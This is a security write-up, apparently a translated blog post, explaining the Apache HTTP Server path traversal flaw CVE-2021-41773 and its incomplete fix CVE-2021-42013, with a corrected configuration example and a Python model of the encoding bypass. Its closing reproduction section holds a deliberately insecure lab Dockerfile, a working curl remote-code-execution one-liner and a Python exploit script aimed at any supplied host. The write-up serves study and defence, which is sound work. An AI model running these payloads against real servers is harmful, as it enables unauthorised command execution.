On Monday, October 4th, Apache disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, tracked as CVE-2021-41773. Update 2.4.50 was released at the same time to fix it. The vulnerability lets an attacker bypass path-traversal protections with URL encoding and read arbitrary files on the web server's file system. Both Linux and Windows servers running this version of Apache are affected.
The flaw was introduced in 2.4.49 by a change meant to make URL path normalization faster. The new normalization could be bypassed by URL-encoding the dot character: a ".." segment sent as ".%2e" was not recognised as a traversal. If the server's <Directory /> block is not set to the default "Require all denied", exploitation is relatively trivial: encode the dots, splice the payload into a URL, and a classic path traversal follows.
Because exploitation is so simple, several public proof-of-concept scripts are already available. A demo can also be done with plain curl: the attacker only needs enough ".." segments to climb back to the file system root, each written with the small encoding change that defeats URL normalization.
If mod_cgi (or mod_cgid) is enabled, the same traversal under a ScriptAlias prefix such as /cgi-bin/ becomes remote code execution: the file the traversal lands on (for example /bin/sh) is executed as a CGI program, and the POST body is handed to it on standard input. CGI is rarely used in modern web stacks, but many older deployments still rely on it.
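The configuration precondition described above, shown as an added example that is not from the original post or from the Apache project: the <Directory /> block that the lab Dockerfile later on this page substitutes (weak) beside the stock httpd.conf default (corrected). Directory paths are those of the official httpd Docker image and are assumed.

```apache
# WEAK: what the reproduction lab deliberately configures. With the filesystem
# root opened up, a traversal that escapes the Alias/ScriptAlias directory
# lands on a path that is still permitted, so the file is read (or, under
# /cgi-bin/, executed).
<Directory />
    AllowOverride none
    Require all granted
</Directory>

# CORRECTED: the httpd.conf default. A traversal that escapes the aliased
# directory now resolves to a location that is denied, so the request ends
# in 403 even on a build that still has the normalization bug. This is a
# mitigation, not a fix; upgrade to a patched release as well.
<Directory />
    AllowOverride none
    Require all denied
</Directory>

# Only the directories that are actually served get opened, one by one.
<Directory "/usr/local/apache2/htdocs">
    Require all granted
</Directory>
<Directory "/usr/local/apache2/cgi-bin">
    AllowOverride None
    Options None
    Require all granted
</Directory>
```

The two root blocks are alternatives: keep the second, delete the first. Access checks apply to the resolved filesystem path, which is why a denied root catches the escape regardless of how the URL was encoded.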
On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:
- CVE-2021-41524: Null Pointer Dereference Vulnerability
- CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability
- CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)
For descriptions of these vulnerabilities, see the Apache Security Announcement. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers.
Overview
The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker can use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside those directories are not protected by the usual default configuration "Require all denied", these requests can succeed. If CGI scripts are also enabled for those aliased paths, this can allow remote code execution. These vulnerabilities are known to be exploited in the wild. As with CVE-2021-41773, the bug is only reachable under an insecure configuration, namely when the site configuration grants access to the filesystem root / with
Require all granted
Put plainly, the payload is /../../../../../bin/sh URL-encoded twice. The previous bug used a single layer of URL encoding, and the previous fix only added checks for the single-encoded forms of the dot (.%2e and %2e%2e). A second encoding layer, .%%32%65, survives that check as .%2e and is only decoded to .. later in request processing. It is rather like a CTF bypass challenge, a battle of wits between developers and attackers, and the way the patch was fixed is worth studying.
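To make the single-versus-double encoding point concrete, here is a small model of the decode-then-check ordering that both the first bug and its incomplete fix depend on. This is an added illustration, not Apache's code: map_url, map_url_hardened, decode_once and CGI_ROOT are hypothetical names, the "0 passes" and "1 pass" settings only roughly stand in for the 2.4.49 and 2.4.50 behaviour, the CGI directory path is assumed to be that of the official httpd image, and the two payloads are constructed from the PoC requests on this page. The hardened variant is one reasonable fix, not the upstream patch.

```python
"""Model of the CVE-2021-41773 -> CVE-2021-42013 encoding bypass.

Added illustration, NOT Apache's code: the decode/check ordering below is a
simplified stand-in for httpd's path normalization and file mapping.
"""
import posixpath
import string

# Assumed script directory, matching the official httpd Docker image.
CGI_ROOT = "/usr/local/apache2/cgi-bin"


def decode_once(s: str) -> str:
    """One pass of percent-decoding. A valid %XX becomes one character; a '%'
    that does not start a valid escape (the first '%' of '%%32%65') is kept,
    so '%%32%65' decodes to '%2e' and only a second pass yields '.'."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and all(c in string.hexdigits for c in s[i + 1:i + 3]):
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def map_url(url_path: str, decode_passes_before_check: int):
    """Vulnerable pipeline. The normalizer decodes `decode_passes_before_check`
    times and rejects any literal '..' segment (None means HTTP 400); the file
    mapper then finishes with two decode passes in total before joining the
    result onto CGI_ROOT.
    0 roughly models 2.4.49 (CVE-2021-41773: '.%2e' is never seen as '..').
    1 roughly models 2.4.50 (CVE-2021-42013: '.%%32%65' is still '.%2e' when
    checked and only becomes '..' afterwards)."""
    checked = url_path
    for _ in range(decode_passes_before_check):
        checked = decode_once(checked)
    if any(seg == ".." for seg in checked.split("/")):
        return None
    mapped = checked
    for _ in range(2 - decode_passes_before_check):
        mapped = decode_once(mapped)
    return posixpath.normpath(CGI_ROOT + "/" + mapped.lstrip("/"))


def map_url_hardened(url_path: str):
    """Hardened pipeline (illustrative, not the upstream patch): decode exactly
    once, refuse anything that still carries an escape, and check containment
    on the final normalized filesystem path instead of on URL segments.
    Strict by design: a file legitimately named with '%' is also refused."""
    decoded = decode_once(url_path)
    if "%" in decoded:          # a second encoding layer survived: reject
        return None
    target = posixpath.normpath(CGI_ROOT + "/" + decoded.lstrip("/"))
    if target != CGI_ROOT and not target.startswith(CGI_ROOT + "/"):
        return None             # resolved outside the script directory
    return target


# Constructed request paths, built the same way as the PoC requests on this page.
SINGLE = "/" + "/".join([".%2e"] * 5) + "/bin/sh"       # CVE-2021-41773 payload
DOUBLE = "/" + "/".join([".%%32%65"] * 5) + "/bin/sh"   # CVE-2021-42013 payload

if __name__ == "__main__":
    for label, payload in (("single-encoded", SINGLE), ("double-encoded", DOUBLE)):
        print(f"{label:15} 2.4.49-like -> {map_url(payload, 0)}")
        print(f"{label:15} 2.4.50-like -> {map_url(payload, 1)}")
        print(f"{label:15} hardened    -> {map_url_hardened(payload)}")
```

Running it shows the single-encoded payload reaching /bin/sh only in the 0-pass model, the double-encoded payload reaching /bin/sh in both vulnerable models, and the hardened mapper refusing both. The lesson generalizes beyond this CVE: any check performed on a representation that is decoded again afterwards can be bypassed by adding one more encoding layer, so validate the final decoded path and refuse leftover escapes.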
Reproduction environment setup
https://hub.docker.com/r/blueteamsteve/cve-2021-41773
Dockerfile for a locally built image. It enables CGI and directory listing and replaces the <Directory /> block with "Require all granted", which is the insecure precondition the bug needs:
FROM httpd:2.4.50
# Enable mod_cgid (threaded MPMs) and mod_cgi (prefork); the IfModule guards in
# httpd.conf pick the right one. Autoindex is enabled for convenient browsing.
RUN set -ex \
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
    # Rewrite the whole <Directory /> block: newlines are swapped for \r so the
    # non-greedy match spans the block, then swapped back.
    && cat /usr/local/apache2/conf/httpd.conf \
       | tr '\n' '\r' \
       | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
       | tr '\r' '\n' \
       | tee /tmp/httpd.conf \
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
Then run the following commands:
docker build -t httpd:2.4.50rce .
docker run -d -p 7006:80 httpd:2.4.50rce
Reproduction result
PoC:
curl --data "echo;id" 'http://xxx.xxxx:XXX/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
The POST body is executed by /bin/sh as a CGI program. The leading "echo;" prints the empty line that terminates the CGI header block; without it httpd treats the output as a malformed header and answers 500 instead of returning the command output.
Scripted version
import sys
import requests

# Usage: python3 poc.py <host> <port>
host = sys.argv[1]
port = sys.argv[2]
# Five double-encoded '..' segments (.%%32%65) climb out of /cgi-bin/ to /bin/bash,
# which mod_cgi then executes with the POST body on standard input.
url_dir = 'http://' + host + ':' + port + '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
# The leading 'echo;' writes the blank line that ends the CGI header block;
# the marker that follows is what we look for in the response body.
data = "echo;echo QWERTYUI "
s = requests.Session()
req = requests.Request('POST', url_dir, data=data, headers=headers)
pred = req.prepare()
# prepare() re-quotes the path and would turn the bare '%' into '%25';
# putting the raw URL back keeps the double-encoded payload intact.
pred.url = url_dir
# Sent through a local Burp proxy for inspection; drop proxies= to send directly.
reqPost = s.send(pred, verify=False, proxies={"http": "http://127.0.0.1:8080"})
if "QWERTYUI" in reqPost.text:
    print("SUCCESS")
else:
    print("Fail")
Reference links
https://www.o2oxy.cn/3740.html
https://downloads.apache.org/httpd/CHANGES_2.4
https://mp.weixin.qq.com/s/A3zm4ArkYKfrTcgckQmo_w
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/cve-2021-41773-apache-web-server-path-traversal/
https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html
Originally published on the WeChat official account 无级安全: Apache arbitrary file read patch bypass (CVE-2021-42013)